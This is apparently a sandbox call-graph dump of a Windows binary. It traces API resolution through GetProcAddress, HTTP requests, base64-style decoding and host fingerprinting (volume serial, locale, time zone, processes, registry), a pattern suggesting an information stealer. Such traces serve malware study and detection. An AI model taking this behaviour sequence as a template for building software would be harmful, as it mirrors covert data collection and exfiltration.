14322->14323 14324 c345c0 2 API calls 14323->14324 14325 c341da 14324->14325 14326 c345c0 2 API calls 14325->14326 14327 c341f3 14326->14327 14328 c345c0 2 API calls 14327->14328 14329 c3420c 14328->14329 14330 c345c0 2 API calls 14329->14330 14331 c34225 14330->14331 14332 c345c0 2 API calls 14331->14332 14333 c3423e 14332->14333 14334 c345c0 2 API calls 14333->14334 14335 c34257 14334->14335 14336 c345c0 2 API calls 14335->14336 14337 c34270 14336->14337 14338 c345c0 2 API calls 14337->14338 14339 c34289 14338->14339 14340 c345c0 2 API calls 14339->14340 14341 c342a2 14340->14341 14342 c345c0 2 API calls 14341->14342 14343 c342bb 14342->14343 14344 c345c0 2 API calls 14343->14344 14345 c342d4 14344->14345 14346 c345c0 2 API calls 14345->14346 14347 c342ed 14346->14347 14348 c345c0 2 API calls 14347->14348 14349 c34306 14348->14349 14350 c345c0 2 API calls 14349->14350 14351 c3431f 14350->14351 14352 c345c0 2 API calls 14351->14352 14353 c34338 14352->14353 14354 c345c0 2 API calls 14353->14354 14355 c34351 14354->14355 14356 c345c0 2 API calls 14355->14356 14357 c3436a 14356->14357 14358 c345c0 2 API calls 14357->14358 14359 c34383 14358->14359 14360 c345c0 2 API calls 14359->14360 14361 c3439c 14360->14361 14362 c345c0 2 API calls 14361->14362 14363 c343b5 14362->14363 14364 c345c0 2 API calls 14363->14364 14365 c343ce 14364->14365 14366 c345c0 2 API calls 14365->14366 14367 c343e7 14366->14367 14368 c345c0 2 API calls 14367->14368 14369 c34400 14368->14369 14370 c345c0 2 API calls 14369->14370 14371 c34419 14370->14371 14372 c345c0 2 API calls 14371->14372 14373 c34432 14372->14373 14374 c345c0 2 API calls 14373->14374 14375 c3444b 14374->14375 14376 c345c0 2 API calls 14375->14376 14377 c34464 14376->14377 14378 c345c0 2 API calls 14377->14378 14379 c3447d 14378->14379 14380 c345c0 2 API calls 14379->14380 14381 c34496 14380->14381 14382 c345c0 2 API calls 14381->14382 14383 c344af 14382->14383 14384 c345c0 2 API calls 14383->14384 14385 c344c8 14384->14385 14386 c345c0 2 API calls 14385->14386 14387 c344e1 14386->14387 14388 c345c0 2 API calls 14387->14388 14389 c344fa 14388->14389 14390 c345c0 2 API calls 14389->14390 14391 c34513 14390->14391 14392 c345c0 2 API calls 14391->14392 14393 c3452c 14392->14393 14394 c345c0 2 API calls 14393->14394 14395 c34545 14394->14395 14396 c345c0 2 API calls 14395->14396 14397 c3455e 14396->14397 14398 c345c0 2 API calls 14397->14398 14399 c34577 14398->14399 14400 c345c0 2 API calls 14399->14400 14401 c34590 14400->14401 14402 c345c0 2 API calls 14401->14402 14403 c345a9 14402->14403 14404 c49c10 14403->14404 14405 c4a036 8 API calls 14404->14405 14406 c49c20 43 API calls 14404->14406 14407 c4a146 14405->14407 14408 c4a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14405->14408 14406->14405 14409 c4a216 14407->14409 14410 c4a153 8 API calls 14407->14410 14408->14407 14411 c4a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14409->14411 14412 c4a298 14409->14412 14410->14409 14411->14412 14413 c4a2a5 6 API calls 14412->14413 14414 c4a337 14412->14414 14413->14414 14415 c4a344 9 API calls 14414->14415 14416 c4a41f 14414->14416 14415->14416 14417 c4a4a2 14416->14417 14418 c4a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14416->14418 14419 c4a4dc 14417->14419 14420 c4a4ab GetProcAddress GetProcAddress 14417->14420 14418->14417 14421 c4a515 14419->14421 14422 c4a4e5 GetProcAddress GetProcAddress 14419->14422 14420->14419 14423 c4a612 14421->14423 14424 c4a522 10 API calls 14421->14424 14422->14421 14425 c4a67d 14423->14425 14426 c4a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14423->14426 14424->14423 14427 c4a686 GetProcAddress 14425->14427 14428 c4a69e 14425->14428 14426->14425 14427->14428 14429 c4a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14428->14429 14430 c45ca3 14428->14430 14429->14430 14431 c31590 14430->14431 15550 c31670 14431->15550 14434 c4a7a0 lstrcpy 14435 c315b5 14434->14435 14436 c4a7a0 lstrcpy 14435->14436 14437 c315c7 14436->14437 14438 c4a7a0 lstrcpy 14437->14438 14439 c315d9 14438->14439 14440 c4a7a0 lstrcpy 14439->14440 14441 c31663 14440->14441 14442 c45510 14441->14442 14443 c45521 14442->14443 14444 c4a820 2 API calls 14443->14444 14445 c4552e 14444->14445 14446 c4a820 2 API calls 14445->14446 14447 c4553b 14446->14447 14448 c4a820 2 API calls 14447->14448 14449 c45548 14448->14449 14450 c4a740 lstrcpy 14449->14450 14451 c45555 14450->14451 14452 c4a740 lstrcpy 14451->14452 14453 c45562 14452->14453 14454 c4a740 lstrcpy 14453->14454 14455 c4556f 14454->14455 14456 c4a740 lstrcpy 14455->14456 14475 c4557c 14456->14475 14457 c451f0 20 API calls 14457->14475 14458 c45643 StrCmpCA 14458->14475 14459 c456a0 StrCmpCA 14460 c457dc 14459->14460 14459->14475 14461 c4a8a0 lstrcpy 14460->14461 14462 c457e8 14461->14462 14463 c4a820 2 API calls 14462->14463 14465 c457f6 14463->14465 14464 c4a820 lstrlen lstrcpy 14464->14475 14467 c4a820 2 API calls 14465->14467 14466 c45856 StrCmpCA 14468 c45991 14466->14468 14466->14475 14470 c45805 14467->14470 14469 c4a8a0 lstrcpy 14468->14469 14471 c4599d 14469->14471 14472 c31670 lstrcpy 14470->14472 14473 c4a820 2 API calls 14471->14473 14496 c45811 14472->14496 14476 c459ab 14473->14476 14474 c4a740 lstrcpy 14474->14475 14475->14457 14475->14458 14475->14459 14475->14464 14475->14466 14475->14474 14477 c45a0b StrCmpCA 14475->14477 14478 c452c0 25 API calls 14475->14478 14482 c4a7a0 lstrcpy 14475->14482 14490 c4578a StrCmpCA 14475->14490 14493 c31590 lstrcpy 14475->14493 14494 c4593f StrCmpCA 14475->14494 14495 c4a8a0 lstrcpy 14475->14495 14479 c4a820 2 API calls 14476->14479 14480 c45a16 Sleep 14477->14480 14481 c45a28 14477->14481 14478->14475 14483 c459ba 14479->14483 14480->14475 14484 c4a8a0 lstrcpy 14481->14484 14482->14475 14485 c31670 lstrcpy 14483->14485 14486 c45a34 14484->14486 14485->14496 14487 c4a820 2 API calls 14486->14487 14488 c45a43 14487->14488 14489 c4a820 2 API calls 14488->14489 14491 c45a52 14489->14491 14490->14475 14492 c31670 lstrcpy 14491->14492 14492->14496 14493->14475 14494->14475 14495->14475 14496->13549 14498 c47553 GetVolumeInformationA 14497->14498 14499 c4754c 14497->14499 14500 c47591 14498->14500 14499->14498 14501 c475fc GetProcessHeap RtlAllocateHeap 14500->14501 14502 c47628 wsprintfA 14501->14502 14503 c47619 14501->14503 14505 c4a740 lstrcpy 14502->14505 14504 c4a740 lstrcpy 14503->14504 14506 c45da7 14504->14506 14505->14506 14506->13570 14508 c4a7a0 lstrcpy 14507->14508 14509 c34899 14508->14509 15559 c347b0 14509->15559 14511 c348a5 14512 c4a740 lstrcpy 14511->14512 14513 c348d7 14512->14513 14514 c4a740 lstrcpy 14513->14514 14515 c348e4 14514->14515 14516 c4a740 lstrcpy 14515->14516 14517 c348f1 14516->14517 14518 c4a740 lstrcpy 14517->14518 14519 c348fe 14518->14519 14520 c4a740 lstrcpy 14519->14520 14521 c3490b InternetOpenA StrCmpCA 14520->14521 14522 c34944 14521->14522 14523 c34ecb InternetCloseHandle 14522->14523 15565 c48b60 14522->15565 14525 c34ee8 14523->14525 15580 c39ac0 CryptStringToBinaryA 14525->15580 14526 c34963 15573 c4a920 14526->15573 14529 c34976 14531 c4a8a0 lstrcpy 14529->14531 14536 c3497f 14531->14536 14532 c4a820 2 API calls 14533 c34f05 14532->14533 14535 c4a9b0 4 API calls 14533->14535 14534 c34f27 codecvt 14538 c4a7a0 lstrcpy 14534->14538 14537 c34f1b 14535->14537 14540 c4a9b0 4 API calls 14536->14540 14539 c4a8a0 lstrcpy 14537->14539 14551 c34f57 14538->14551 14539->14534 14541 c349a9 14540->14541 14542 c4a8a0 lstrcpy 14541->14542 14543 c349b2 14542->14543 14544 c4a9b0 4 API calls 14543->14544 14545 c349d1 14544->14545 14546 c4a8a0 lstrcpy 14545->14546 14547 c349da 14546->14547 14548 c4a920 3 API calls 14547->14548 14549 c349f8 14548->14549 14550 c4a8a0 lstrcpy 14549->14550 14552 c34a01 14550->14552 14551->13573 14553 c4a9b0 4 API calls 14552->14553 14554 c34a20 14553->14554 14555 c4a8a0 lstrcpy 14554->14555 14556 c34a29 14555->14556 14557 c4a9b0 4 API calls 14556->14557 14558 c34a48 14557->14558 14559 c4a8a0 lstrcpy 14558->14559 14560 c34a51 14559->14560 14561 c4a9b0 4 API calls 14560->14561 14562 c34a7d 14561->14562 14563 c4a920 3 API calls 14562->14563 14564 c34a84 14563->14564 14565 c4a8a0 lstrcpy 14564->14565 14566 c34a8d 14565->14566 14567 c34aa3 InternetConnectA 14566->14567 14567->14523 14568 c34ad3 HttpOpenRequestA 14567->14568 14570 c34b28 14568->14570 14571 c34ebe InternetCloseHandle 14568->14571 14572 c4a9b0 4 API calls 14570->14572 14571->14523 14573 c34b3c 14572->14573 14574 c4a8a0 lstrcpy 14573->14574 14575 c34b45 14574->14575 14576 c4a920 3 API calls 14575->14576 14577 c34b63 14576->14577 14578 c4a8a0 lstrcpy 14577->14578 14579 c34b6c 14578->14579 14580 c4a9b0 4 API calls 14579->14580 14581 c34b8b 14580->14581 14582 c4a8a0 lstrcpy 14581->14582 14583 c34b94 14582->14583 14584 c4a9b0 4 API calls 14583->14584 14585 c34bb5 14584->14585 14586 c4a8a0 lstrcpy 14585->14586 14587 c34bbe 14586->14587 14588 c4a9b0 4 API calls 14587->14588 14589 c34bde 14588->14589 14590 c4a8a0 lstrcpy 14589->14590 14591 c34be7 14590->14591 14592 c4a9b0 4 API calls 14591->14592 14593 c34c06 14592->14593 14594 c4a8a0 lstrcpy 14593->14594 14595 c34c0f 14594->14595 14596 c4a920 3 API calls 14595->14596 14597 c34c2d 14596->14597 14598 c4a8a0 lstrcpy 14597->14598 14599 c34c36 14598->14599 14600 c4a9b0 4 API calls 14599->14600 14601 c34c55 14600->14601 14602 c4a8a0 lstrcpy 14601->14602 14603 c34c5e 14602->14603 14604 c4a9b0 4 API calls 14603->14604 14605 c34c7d 14604->14605 14606 c4a8a0 lstrcpy 14605->14606 14607 c34c86 14606->14607 14608 c4a920 3 API calls 14607->14608 14609 c34ca4 14608->14609 14610 c4a8a0 lstrcpy 14609->14610 14611 c34cad 14610->14611 14612 c4a9b0 4 API calls 14611->14612 14613 c34ccc 14612->14613 14614 c4a8a0 lstrcpy 14613->14614 14615 c34cd5 14614->14615 14616 c4a9b0 4 API calls 14615->14616 14617 c34cf6 14616->14617 14618 c4a8a0 lstrcpy 14617->14618 14619 c34cff 14618->14619 14620 c4a9b0 4 API calls 14619->14620 14621 c34d1f 14620->14621 14622 c4a8a0 lstrcpy 14621->14622 14623 c34d28 14622->14623 14624 c4a9b0 4 API calls 14623->14624 14625 c34d47 14624->14625 14626 c4a8a0 lstrcpy 14625->14626 14627 c34d50 14626->14627 14628 c4a920 3 API calls 14627->14628 14629 c34d6e 14628->14629 14630 c4a8a0 lstrcpy 14629->14630 14631 c34d77 14630->14631 14632 c4a740 lstrcpy 14631->14632 14633 c34d92 14632->14633 14634 c4a920 3 API calls 14633->14634 14635 c34db3 14634->14635 14636 c4a920 3 API calls 14635->14636 14637 c34dba 14636->14637 14638 c4a8a0 lstrcpy 14637->14638 14639 c34dc6 14638->14639 14640 c34de7 lstrlen 14639->14640 14641 c34dfa 14640->14641 14642 c34e03 lstrlen 14641->14642 15579 c4aad0 14642->15579 14644 c34e13 HttpSendRequestA 14645 c34e32 InternetReadFile 14644->14645 14646 c34e67 InternetCloseHandle 14645->14646 14651 c34e5e 14645->14651 14648 c4a800 14646->14648 14648->14571 14649 c4a9b0 4 API calls 14649->14651 14650 c4a8a0 lstrcpy 14650->14651 14651->14645 14651->14646 14651->14649 14651->14650 15586 c4aad0 14652->15586 14654 c417c4 StrCmpCA 14655 c417d7 14654->14655 14656 c417cf ExitProcess 14654->14656 14657 c419c2 14655->14657 14658 c418ad StrCmpCA 14655->14658 14659 c418cf StrCmpCA 14655->14659 14660 c41970 StrCmpCA 14655->14660 14661 c418f1 StrCmpCA 14655->14661 14662 c41951 StrCmpCA 14655->14662 14663 c41932 StrCmpCA 14655->14663 14664 c41913 StrCmpCA 14655->14664 14665 c4185d StrCmpCA 14655->14665 14666 c4187f StrCmpCA 14655->14666 14667 c4a820 lstrlen lstrcpy 14655->14667 14657->13575 14658->14655 14659->14655 14660->14655 14661->14655 14662->14655 14663->14655 14664->14655 14665->14655 14666->14655 14667->14655 14669 c4a7a0 lstrcpy 14668->14669 14670 c35979 14669->14670 14671 c347b0 2 API calls 14670->14671 14672 c35985 14671->14672 14673 c4a740 lstrcpy 14672->14673 14674 c359ba 14673->14674 14675 c4a740 lstrcpy 14674->14675 14676 c359c7 14675->14676 14677 c4a740 lstrcpy 14676->14677 14678 c359d4 14677->14678 14679 c4a740 lstrcpy 14678->14679 14680 c359e1 14679->14680 14681 c4a740 lstrcpy 14680->14681 14682 c359ee InternetOpenA StrCmpCA 14681->14682 14683 c35a1d 14682->14683 14684 c35fc3 InternetCloseHandle 14683->14684 14685 c48b60 3 API calls 14683->14685 14686 c35fe0 14684->14686 14687 c35a3c 14685->14687 14689 c39ac0 4 API calls 14686->14689 14688 c4a920 3 API calls 14687->14688 14691 c35a4f 14688->14691 14690 c35fe6 14689->14690 14693 c4a820 2 API calls 14690->14693 14696 c3601f codecvt 14690->14696 14692 c4a8a0 lstrcpy 14691->14692 14697 c35a58 14692->14697 14694 c35ffd 14693->14694 14695 c4a9b0 4 API calls 14694->14695 14698 c36013 14695->14698 14700 c4a7a0 lstrcpy 14696->14700 14701 c4a9b0 4 API calls 14697->14701 14699 c4a8a0 lstrcpy 14698->14699 14699->14696 14709 c3604f 14700->14709 14702 c35a82 14701->14702 14703 c4a8a0 lstrcpy 14702->14703 14704 c35a8b 14703->14704 14705 c4a9b0 4 API calls 14704->14705 14706 c35aaa 14705->14706 14707 c4a8a0 lstrcpy 14706->14707 14708 c35ab3 14707->14708 14710 c4a920 3 API calls 14708->14710 14709->13581 14711 c35ad1 14710->14711 14712 c4a8a0 lstrcpy 14711->14712 14713 c35ada 14712->14713 14714 c4a9b0 4 API calls 14713->14714 14715 c35af9 14714->14715 14716 c4a8a0 lstrcpy 14715->14716 14717 c35b02 14716->14717 14718 c4a9b0 4 API calls 14717->14718 14719 c35b21 14718->14719 14720 c4a8a0 lstrcpy 14719->14720 14721 c35b2a 14720->14721 14722 c4a9b0 4 API calls 14721->14722 14723 c35b56 14722->14723 14724 c4a920 3 API calls 14723->14724 14725 c35b5d 14724->14725 14726 c4a8a0 lstrcpy 14725->14726 14727 c35b66 14726->14727 14728 c35b7c InternetConnectA 14727->14728 14728->14684 14729 c35bac HttpOpenRequestA 14728->14729 14731 c35fb6 InternetCloseHandle 14729->14731 14732 c35c0b 14729->14732 14731->14684 14733 c4a9b0 4 API calls 14732->14733 14734 c35c1f 14733->14734 14735 c4a8a0 lstrcpy 14734->14735 14736 c35c28 14735->14736 14737 c4a920 3 API calls 14736->14737 14738 c35c46 14737->14738 14739 c4a8a0 lstrcpy 14738->14739 14740 c35c4f 14739->14740 14741 c4a9b0 4 API calls 14740->14741 14742 c35c6e 14741->14742 14743 c4a8a0 lstrcpy 14742->14743 14744 c35c77 14743->14744 14745 c4a9b0 4 API calls 14744->14745 14746 c35c98 14745->14746 14747 c4a8a0 lstrcpy 14746->14747 14748 c35ca1 14747->14748 14749 c4a9b0 4 API calls 14748->14749 14750 c35cc1 14749->14750 14751 c4a8a0 lstrcpy 14750->14751 14752 c35cca 14751->14752 14753 c4a9b0 4 API calls 14752->14753 14754 c35ce9 14753->14754 14755 c4a8a0 lstrcpy 14754->14755 14756 c35cf2 14755->14756 14757 c4a920 3 API calls 14756->14757 14758 c35d10 14757->14758 14759 c4a8a0 lstrcpy 14758->14759 14760 c35d19 14759->14760 14761 c4a9b0 4 API calls 14760->14761 14762 c35d38 14761->14762 14763 c4a8a0 lstrcpy 14762->14763 14764 c35d41 14763->14764 14765 c4a9b0 4 API calls 14764->14765 14766 c35d60 14765->14766 14767 c4a8a0 lstrcpy 14766->14767 14768 c35d69 14767->14768 14769 c4a920 3 API calls 14768->14769 14770 c35d87 14769->14770 14771 c4a8a0 lstrcpy 14770->14771 14772 c35d90 14771->14772 14773 c4a9b0 4 API calls 14772->14773 14774 c35daf 14773->14774 14775 c4a8a0 lstrcpy 14774->14775 14776 c35db8 14775->14776 14777 c4a9b0 4 API calls 14776->14777 14778 c35dd9 14777->14778 14779 c4a8a0 lstrcpy 14778->14779 14780 c35de2 14779->14780 14781 c4a9b0 4 API calls 14780->14781 14782 c35e02 14781->14782 14783 c4a8a0 lstrcpy 14782->14783 14784 c35e0b 14783->14784 14785 c4a9b0 4 API calls 14784->14785 14786 c35e2a 14785->14786 14787 c4a8a0 lstrcpy 14786->14787 14788 c35e33 14787->14788 14789 c4a920 3 API calls 14788->14789 14790 c35e54 14789->14790 14791 c4a8a0 lstrcpy 14790->14791 14792 c35e5d 14791->14792 14793 c35e70 lstrlen 14792->14793 15587 c4aad0 14793->15587 14795 c35e81 lstrlen GetProcessHeap RtlAllocateHeap 15588 c4aad0 14795->15588 14797 c35eae lstrlen 14798 c35ebe 14797->14798 14799 c35ed7 lstrlen 14798->14799 14800 c35ee7 14799->14800 14801 c35ef0 lstrlen 14800->14801 14802 c35f04 14801->14802 14803 c35f1a lstrlen 14802->14803 15589 c4aad0 14803->15589 14805 c35f2a HttpSendRequestA 14806 c35f35 InternetReadFile 14805->14806 14807 c35f6a InternetCloseHandle 14806->14807 14811 c35f61 14806->14811 14807->14731 14809 c4a9b0 4 API calls 14809->14811 14810 c4a8a0 lstrcpy 14810->14811 14811->14806 14811->14807 14811->14809 14811->14810 14814 c41077 14812->14814 14813 c41151 14813->13583 14814->14813 14815 c4a820 lstrlen lstrcpy 14814->14815 14815->14814 14817 c40db7 14816->14817 14818 c40f17 14817->14818 14819 c40ea4 StrCmpCA 14817->14819 14820 c40e27 StrCmpCA 14817->14820 14821 c40e67 StrCmpCA 14817->14821 14822 c4a820 lstrlen lstrcpy 14817->14822 14818->13591 14819->14817 14820->14817 14821->14817 14822->14817 14824 c40f67 14823->14824 14825 c41044 14824->14825 14826 c40fb2 StrCmpCA 14824->14826 14827 c4a820 lstrlen lstrcpy 14824->14827 14825->13599 14826->14824 14827->14824 14829 c4a740 lstrcpy 14828->14829 14830 c41a26 14829->14830 14831 c4a9b0 4 API calls 14830->14831 14832 c41a37 14831->14832 14833 c4a8a0 lstrcpy 14832->14833 14834 c41a40 14833->14834 14835 c4a9b0 4 API calls 14834->14835 14836 c41a5b 14835->14836 14837 c4a8a0 lstrcpy 14836->14837 14838 c41a64 14837->14838 14839 c4a9b0 4 API calls 14838->14839 14840 c41a7d 14839->14840 14841 c4a8a0 lstrcpy 14840->14841 14842 c41a86 14841->14842 14843 c4a9b0 4 API calls 14842->14843 14844 c41aa1 14843->14844 14845 c4a8a0 lstrcpy 14844->14845 14846 c41aaa 14845->14846 14847 c4a9b0 4 API calls 14846->14847 14848 c41ac3 14847->14848 14849 c4a8a0 lstrcpy 14848->14849 14850 c41acc 14849->14850 14851 c4a9b0 4 API calls 14850->14851 14852 c41ae7 14851->14852 14853 c4a8a0 lstrcpy 14852->14853 14854 c41af0 14853->14854 14855 c4a9b0 4 API calls 14854->14855 14856 c41b09 14855->14856 14857 c4a8a0 lstrcpy 14856->14857 14858 c41b12 14857->14858 14859 c4a9b0 4 API calls 14858->14859 14860 c41b2d 14859->14860 14861 c4a8a0 lstrcpy 14860->14861 14862 c41b36 14861->14862 14863 c4a9b0 4 API calls 14862->14863 14864 c41b4f 14863->14864 14865 c4a8a0 lstrcpy 14864->14865 14866 c41b58 14865->14866 14867 c4a9b0 4 API calls 14866->14867 14868 c41b76 14867->14868 14869 c4a8a0 lstrcpy 14868->14869 14870 c41b7f 14869->14870 14871 c47500 6 API calls 14870->14871 14872 c41b96 14871->14872 14873 c4a920 3 API calls 14872->14873 14874 c41ba9 14873->14874 14875 c4a8a0 lstrcpy 14874->14875 14876 c41bb2 14875->14876 14877 c4a9b0 4 API calls 14876->14877 14878 c41bdc 14877->14878 14879 c4a8a0 lstrcpy 14878->14879 14880 c41be5 14879->14880 14881 c4a9b0 4 API calls 14880->14881 14882 c41c05 14881->14882 14883 c4a8a0 lstrcpy 14882->14883 14884 c41c0e 14883->14884 15590 c47690 GetProcessHeap RtlAllocateHeap 14884->15590 14887 c4a9b0 4 API calls 14888 c41c2e 14887->14888 14889 c4a8a0 lstrcpy 14888->14889 14890 c41c37 14889->14890 14891 c4a9b0 4 API calls 14890->14891 14892 c41c56 14891->14892 14893 c4a8a0 lstrcpy 14892->14893 14894 c41c5f 14893->14894 14895 c4a9b0 4 API calls 14894->14895 14896 c41c80 14895->14896 14897 c4a8a0 lstrcpy 14896->14897 14898 c41c89 14897->14898 15597 c477c0 GetCurrentProcess IsWow64Process 14898->15597 14901 c4a9b0 4 API calls 14902 c41ca9 14901->14902 14903 c4a8a0 lstrcpy 14902->14903 14904 c41cb2 14903->14904 14905 c4a9b0 4 API calls 14904->14905 14906 c41cd1 14905->14906 14907 c4a8a0 lstrcpy 14906->14907 14908 c41cda 14907->14908 14909 c4a9b0 4 API calls 14908->14909 14910 c41cfb 14909->14910 14911 c4a8a0 lstrcpy 14910->14911 14912 c41d04 14911->14912 14913 c47850 3 API calls 14912->14913 14914 c41d14 14913->14914 14915 c4a9b0 4 API calls 14914->14915 14916 c41d24 14915->14916 14917 c4a8a0 lstrcpy 14916->14917 14918 c41d2d 14917->14918 14919 c4a9b0 4 API calls 14918->14919 14920 c41d4c 14919->14920 14921 c4a8a0 lstrcpy 14920->14921 14922 c41d55 14921->14922 14923 c4a9b0 4 API calls 14922->14923 14924 c41d75 14923->14924 14925 c4a8a0 lstrcpy 14924->14925 14926 c41d7e 14925->14926 14927 c478e0 3 API calls 14926->14927 14928 c41d8e 14927->14928 14929 c4a9b0 4 API calls 14928->14929 14930 c41d9e 14929->14930 14931 c4a8a0 lstrcpy 14930->14931 14932 c41da7 14931->14932 14933 c4a9b0 4 API calls 14932->14933 14934 c41dc6 14933->14934 14935 c4a8a0 lstrcpy 14934->14935 14936 c41dcf 14935->14936 14937 c4a9b0 4 API calls 14936->14937 14938 c41df0 14937->14938 14939 c4a8a0 lstrcpy 14938->14939 14940 c41df9 14939->14940 15599 c47980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14940->15599 14943 c4a9b0 4 API calls 14944 c41e19 14943->14944 14945 c4a8a0 lstrcpy 14944->14945 14946 c41e22 14945->14946 14947 c4a9b0 4 API calls 14946->14947 14948 c41e41 14947->14948 14949 c4a8a0 lstrcpy 14948->14949 14950 c41e4a 14949->14950 14951 c4a9b0 4 API calls 14950->14951 14952 c41e6b 14951->14952 14953 c4a8a0 lstrcpy 14952->14953 14954 c41e74 14953->14954 15601 c47a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14954->15601 14957 c4a9b0 4 API calls 14958 c41e94 14957->14958 14959 c4a8a0 lstrcpy 14958->14959 14960 c41e9d 14959->14960 14961 c4a9b0 4 API calls 14960->14961 14962 c41ebc 14961->14962 14963 c4a8a0 lstrcpy 14962->14963 14964 c41ec5 14963->14964 14965 c4a9b0 4 API calls 14964->14965 14966 c41ee5 14965->14966 14967 c4a8a0 lstrcpy 14966->14967 14968 c41eee 14967->14968 15604 c47b00 GetUserDefaultLocaleName 14968->15604 14971 c4a9b0 4 API calls 14972 c41f0e 14971->14972 14973 c4a8a0 lstrcpy 14972->14973 14974 c41f17 14973->14974 14975 c4a9b0 4 API calls 14974->14975 14976 c41f36 14975->14976 14977 c4a8a0 lstrcpy 14976->14977 14978 c41f3f 14977->14978 14979 c4a9b0 4 API calls 14978->14979 14980 c41f60 14979->14980 14981 c4a8a0 lstrcpy 14980->14981 14982 c41f69 14981->14982 15608 c47b90 14982->15608 14984 c41f80 14985 c4a920 3 API calls 14984->14985 14986 c41f93 14985->14986 14987 c4a8a0 lstrcpy 14986->14987 14988 c41f9c 14987->14988 14989 c4a9b0 4 API calls 14988->14989 14990 c41fc6 14989->14990 14991 c4a8a0 lstrcpy 14990->14991 14992 c41fcf 14991->14992 14993 c4a9b0 4 API calls 14992->14993 14994 c41fef 14993->14994 14995 c4a8a0 lstrcpy 14994->14995 14996 c41ff8 14995->14996 15620 c47d80 GetSystemPowerStatus 14996->15620 14999 c4a9b0 4 API calls 15000 c42018 14999->15000 15001 c4a8a0 lstrcpy 15000->15001 15002 c42021 15001->15002 15003 c4a9b0 4 API calls 15002->15003 15004 c42040 15003->15004 15005 c4a8a0 lstrcpy 15004->15005 15006 c42049 15005->15006 15007 c4a9b0 4 API calls 15006->15007 15008 c4206a 15007->15008 15009 c4a8a0 lstrcpy 15008->15009 15010 c42073 15009->15010 15011 c4207e GetCurrentProcessId 15010->15011 15622 c49470 OpenProcess 15011->15622 15014 c4a920 3 API calls 15015 c420a4 15014->15015 15016 c4a8a0 lstrcpy 15015->15016 15017 c420ad 15016->15017 15018 c4a9b0 4 API calls 15017->15018 15019 c420d7 15018->15019 15020 c4a8a0 lstrcpy 15019->15020 15021 c420e0 15020->15021 15022 c4a9b0 4 API calls 15021->15022 15023 c42100 15022->15023 15024 c4a8a0 lstrcpy 15023->15024 15025 c42109 15024->15025 15627 c47e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15025->15627 15028 c4a9b0 4 API calls 15029 c42129 15028->15029 15030 c4a8a0 lstrcpy 15029->15030 15031 c42132 15030->15031 15032 c4a9b0 4 API calls 15031->15032 15033 c42151 15032->15033 15034 c4a8a0 lstrcpy 15033->15034 15035 c4215a 15034->15035 15036 c4a9b0 4 API calls 15035->15036 15037 c4217b 15036->15037 15038 c4a8a0 lstrcpy 15037->15038 15039 c42184 15038->15039 15631 c47f60 15039->15631 15042 c4a9b0 4 API calls 15043 c421a4 15042->15043 15044 c4a8a0 lstrcpy 15043->15044 15045 c421ad 15044->15045 15046 c4a9b0 4 API calls 15045->15046 15047 c421cc 15046->15047 15048 c4a8a0 lstrcpy 15047->15048 15049 c421d5 15048->15049 15050 c4a9b0 4 API calls 15049->15050 15051 c421f6 15050->15051 15052 c4a8a0 lstrcpy 15051->15052 15053 c421ff 15052->15053 15644 c47ed0 GetSystemInfo wsprintfA 15053->15644 15056 c4a9b0 4 API calls 15057 c4221f 15056->15057 15058 c4a8a0 lstrcpy 15057->15058 15059 c42228 15058->15059 15060 c4a9b0 4 API calls 15059->15060 15061 c42247 15060->15061 15062 c4a8a0 lstrcpy 15061->15062 15063 c42250 15062->15063 15064 c4a9b0 4 API calls 15063->15064 15065 c42270 15064->15065 15066 c4a8a0 lstrcpy 15065->15066 15067 c42279 15066->15067 15646 c48100 GetProcessHeap RtlAllocateHeap 15067->15646 15070 c4a9b0 4 API calls 15071 c42299 15070->15071 15072 c4a8a0 lstrcpy 15071->15072 15073 c422a2 15072->15073 15074 c4a9b0 4 API calls 15073->15074 15075 c422c1 15074->15075 15076 c4a8a0 lstrcpy 15075->15076 15077 c422ca 15076->15077 15078 c4a9b0 4 API calls 15077->15078 15079 c422eb 15078->15079 15080 c4a8a0 lstrcpy 15079->15080 15081 c422f4 15080->15081 15652 c487c0 15081->15652 15084 c4a920 3 API calls 15085 c4231e 15084->15085 15086 c4a8a0 lstrcpy 15085->15086 15087 c42327 15086->15087 15088 c4a9b0 4 API calls 15087->15088 15089 c42351 15088->15089 15090 c4a8a0 lstrcpy 15089->15090 15091 c4235a 15090->15091 15092 c4a9b0 4 API calls 15091->15092 15093 c4237a 15092->15093 15094 c4a8a0 lstrcpy 15093->15094 15095 c42383 15094->15095 15096 c4a9b0 4 API calls 15095->15096 15097 c423a2 15096->15097 15098 c4a8a0 lstrcpy 15097->15098 15099 c423ab 15098->15099 15657 c481f0 15099->15657 15101 c423c2 15102 c4a920 3 API calls 15101->15102 15103 c423d5 15102->15103 15104 c4a8a0 lstrcpy 15103->15104 15105 c423de 15104->15105 15106 c4a9b0 4 API calls 15105->15106 15107 c4240a 15106->15107 15108 c4a8a0 lstrcpy 15107->15108 15109 c42413 15108->15109 15110 c4a9b0 4 API calls 15109->15110 15111 c42432 15110->15111 15112 c4a8a0 lstrcpy 15111->15112 15113 c4243b 15112->15113 15114 c4a9b0 4 API calls 15113->15114 15115 c4245c 15114->15115 15116 c4a8a0 lstrcpy 15115->15116 15117 c42465 15116->15117 15118 c4a9b0 4 API calls 15117->15118 15119 c42484 15118->15119 15120 c4a8a0 lstrcpy 15119->15120 15121 c4248d 15120->15121 15122 c4a9b0 4 API calls 15121->15122 15123 c424ae 15122->15123 15124 c4a8a0 lstrcpy 15123->15124 15125 c424b7 15124->15125 15665 c48320 15125->15665 15127 c424d3 15128 c4a920 3 API calls 15127->15128 15129 c424e6 15128->15129 15130 c4a8a0 lstrcpy 15129->15130 15131 c424ef 15130->15131 15132 c4a9b0 4 API calls 15131->15132 15133 c42519 15132->15133 15134 c4a8a0 lstrcpy 15133->15134 15135 c42522 15134->15135 15136 c4a9b0 4 API calls 15135->15136 15137 c42543 15136->15137 15138 c4a8a0 lstrcpy 15137->15138 15139 c4254c 15138->15139 15140 c48320 17 API calls 15139->15140 15141 c42568 15140->15141 15142 c4a920 3 API calls 15141->15142 15143 c4257b 15142->15143 15144 c4a8a0 lstrcpy 15143->15144 